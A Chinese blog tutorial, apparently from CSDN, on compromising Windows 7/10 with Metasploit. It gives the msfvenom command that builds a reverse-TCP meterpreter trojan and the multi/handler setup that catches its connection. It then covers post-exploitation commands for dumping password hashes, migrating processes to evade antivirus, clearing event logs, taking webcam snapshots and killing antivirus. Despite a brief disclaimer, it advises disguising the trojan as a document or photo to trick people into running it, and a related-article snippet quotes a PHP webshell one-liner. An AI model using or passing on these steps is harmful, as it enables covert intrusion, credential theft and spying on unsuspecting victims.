简单渗透攻击

已于 2022-03-22 11:58:53 修改
阅读量7.7k 收藏 16
点赞数 4
文章标签: 系统安全
于 2022-03-20 21:45:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53443776/article/details/123620104
版权

针对win(7/10)的简单渗透攻击

前言

这次只是个人的简单实验,请各位学习后不要用于不良途径,可以自行学习,但不要乱用哦!
(!!!学习网络安全法!!!)

一、需要用到的工具

VMware(建议版本是15-16),分别有一台已经搭建好的kali与win(7/10)虚拟机

二、使用步骤

1.使用msf exploit入侵电脑(Win7/Win10皆可)

需要的工具:msfvenom . msfconsole (kali里面有)
制作一个简单的恶意软件,代码如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
例如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.80.3.129 LPORT=6666 -f exe -o test.exe
在这里插入图片描述

这样就生成一个后门软件,名称可以随意

2.使用msfconsole

msfconsole (运行msfconsole)
在这里插入图片描述
在这里插入图片描述
进入后会有很多命令可以用,不知道用什么,可以输入help,查看有哪些。

msf>use exploit/multi/handler (选择模块)
输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加端口号

在这里插入图片描述

exploit -z -j (后台执行)
在这里插入图片描述

到了这里,初步算完成了。
这样木马就配置好了,然后发给别人(可以伪造成文档,照片,软件等文件骗取别人打开)
发给别人后,等待别人打开test.exe,打开即上钩了
对方打开后就会显示一下内容了
在这里插入图片描述

msf exploit(handler) > sessions(查看上钩的用户)
在这里插入图片描述
在这里插入图片描述
msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
进入meterpreter了,即可进行一些相关的木马操作。
在这里插入图片描述
下面调一些重要的功能介绍一下:

  1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务;
  2. sessions:这个命令需要配合上面的background使用,该命令是将后台的会话打开,进行会话操作。
  3. clearev:该命令是用来清除渗透的登录信息的,这个很有用。
  4. hashdump:该命令是一个post模块,需要配合meterpreter使用,这个命令是用来获取目标系统的哈希值的,输入”run post/windows/gather/hashdump”

meterpreter > run post/windows/gather/hashdump

[] Obtaining the boot key…
[] Calculating the hboot key using SYSKEY 1c4d83525a46e3e4670caa28fbf1a7fd…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)

migrate:这个也是一个post模块。可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀软。

meterpreter > run post/windows/manage/migrate

[] Running module against DX1XMSTMBBJR3FZ
[] Current server process: notepad.exe (3292)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 6020
[+] Successfully migrated to process 6020

search:这个命令是用来搜索系统中的文件的。
shell:这个命令是返回目标系统的shell命令行,在windows下返回cmd命令行,在unix下返回sh命令行。这个命令非常实用
webcam_list:列举摄像头。
webcam_snap:通过远程连接目标系统的摄像头。
run killav:关闭对方的杀软,其实关闭杀软也可以进入cmd中手动关闭。
当然meterpreter还有很多很多使用的命令,百度谷歌一大把,不过每一个meterpreter是不一样的,在windows下和linux下功能有差异。在运用中需要help具体查看。

总结

这个实验还是很简单的,主要是考验大家对于工具的使用。

唯思今朝
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透攻击实训教程
12-03
网络渗透攻击事件的发生极为普遍,众多的网络管理员和网络安全工作者却对网络安全环境所面临的严峻考验缺乏足够的认识,因而也未曾采取全面的防范补救措施应对各种攻击行为。《孙子兵法》曰“知已知彼,百战不殆;...
信息安全技术(一)渗透攻击
m0_73736174的博客
05-27 1936
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架介绍:客户端攻击总是一个有趣的话题,并成为今日攻击者的主要攻击目标。随着网络管理员和软件开发人员加强周边环境,测试人员需要找到一种方法让受害者为他们进入网络打开大门。客户端攻击需要用户交互,例如诱使用户点击链接,打开文档或以某种方式进入恶意网站。
渗透攻击的总结
weixin_71139244的博客
05-26 278
如果把目标系统上的漏洞比作阿喀琉斯的脚踝,那么漏洞渗透工具就是帕里斯手中的利箭。我们介绍了如何使用远程控制软件,而在本章中我们将会介绍如何将远程控制软件的被控端发送到目标主机上。这个过程最为神奇的地方就是对目标漏洞的利用。找出目标系统的漏洞,那么在发现了目标系统的漏洞之后,接下来的工作就是要利用漏洞渗透工具来给目标系统最致命的一击。而Metasploit则是目前相当优秀的一款漏洞渗透工具。本章将围绕如下主题介绍Metasploit:口 Metasploit的基础;口 Metasploit的基本命令;
信息安全技术——渗透攻击
最新发布
Ablimit17的博客
05-16 636
主要任务是发现潜在的安全漏洞,并尝试利用它们利用被攻击方的服务,以达到有价值的信息,获取访问令牌,以及让攻击者拥有访问目标站点的权力,进而可以获取外部网络的数据库或机密文件等内容。第三部分是枚举,也就是请求服务器提供的信息,其中可能包括服务器端程序的登录名,组织的安全体系结构,操作系统的版本,安全漏洞,特权用户的列表以及数据库和应用程序的信息。首先,进行端口扫描,扫描内网中防火墙之外的全部可用的端口,以获取特定端口上运行的服务,以获得有价值的信息,包括其它开放端口,运行的服务类型和规模,及其具体IP地址。
Metasploit使用
dzqxwzoe的博客
08-14 380
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。Pivot模块其实就是跳板机,这里我是macos的环境,虚拟环境配置起来会非常的麻烦,简单地说就是域内有一个台主机有两张网卡,分别连不同的网段,我们kali现在只能打到一个网段,但是现在发现还有一个其他的网段,这时候就起作用了。
Kali MSF攻击Win10
nlj1860453的博客
01-05 1176
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
网络渗透测试环境安装包
01-14
网络渗透测试是信息安全领域的重要环节,它通过模拟黑客攻击手段来评估系统安全性,提前发现并修复潜在漏洞。在这个过程中,一套合适的测试环境至关重要。"网络渗透测试环境安装包"就是为了这个目的而准备的,它包含...
内网安全攻防渗透测试实战指南.pptx
07-01
2. 攻击主机平台及常用工具:包括虚拟机的安装、Kali Linux 渗透测试平台及常用工具、Windows 渗透测试平台及常用工具等内容。 3. 内网环境构建:包括域环境搭建、其他服务器环境搭建等内容。 内网基础知识: ...
sqlmap渗透工具
07-06
在Python环境中运行,SQLMap提供了一系列灵活且强大的选项,使得操作简单且高效。 SQLMap的工作原理基于输入数据与数据库查询结果之间的关系分析,通过注入不同的SQL片段来探测和利用潜在的注入漏洞。它支持多种...
渗透测试,后台扫描利器-御剑
08-03
这种攻击方式虽然简单,但往往能取得意想不到的效果,因为许多系统管理员仍然使用默认或者简单的密码。 漏洞探测是御剑的主要任务之一。它包含了大量的已知漏洞数据库,这些漏洞可能存在于Web服务器、数据库系统、...
【网络安全】-- 网络渗透技术攻防(--更新中)
用余生去守护的博客
12-22 3068
我今日所做的事远比我往日的所作所为更好,更好;我今日将享受的安息远比我所知的一切更好,更好。
针对一次渗透攻击的防护
Reggie的博客
03-28 842
一、 黑客攻击路径 1)通过SQL注入攻击获得网页管理员账号密码 2)获取管理网站权限,找到文件上传入口 3)上传获取webshell,在后台执行脚本文件 4)攻击者拿下web服务器 5)开始横向渗透 6)在内网中发现高危漏洞 7)进行高危漏洞的利用 8)拿下内网服务器,服务器与其他内网服务器之间网络互通 9)在内网开始进行横向渗透 10)对内网服务器或系统进行口令爆破 11)弱口令或通用口令的存在导致内网服务器批量沦陷 12)核心数据库失陷 ...
远程控制软件
小飞鸟
10-06 811
meterpreter payload能使用meterpreter尽量用meterpreter。因为它真的很强大,小小的程序可以实现太多太多的功能了。 在meterpreter下面进行help: 可以看到有很多命令工具可以使用,非常方便! 下面调一些重要的功能介绍一下: 1. background:这个命令是将当前的session放到后台运行,可以在msf中继续其他渗透任务; 2. sessio...
网络安全2:各种经典渗透方式合集
热门推荐
ac121388的博客
03-30 1万+
文件上传漏洞 文件包含 有一些主页的php代买中包含了 include *,当上传了一些包含能够生成webshell(一句话木马)的文件后,由index.php自动执行,生成木马。 本地文件包含漏洞 1 向图片中添加一句话病毒 <?fputs(fopen("shell20.php","w"),'<?php eval($_POST[qt]);?>')?> 2. 使用owasp靶机上的dvwa页面上传带有病毒代码的图片 3. 使用中国菜刀控制服务器
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4132
一次MSF模拟渗透测试攻击window实例
WEB网络渗透的基础知识
2201_75362610的博客
03-01 4544
网络渗透攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为”渗透测试。
Kali之渗透攻击
m0_64091527的博客
05-31 1954
kali渗透攻击
电脑不稳定? 可能系统已被病毒渗透:怎样判断是否遭受入侵
weixin_43263566的博客
01-12 6613
如何检查自己电脑是否被攻击了?
metasploit后渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客在未来再次访问受害者系统而不被发现。使用Metasploit创建后门非常简单,只需要执行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值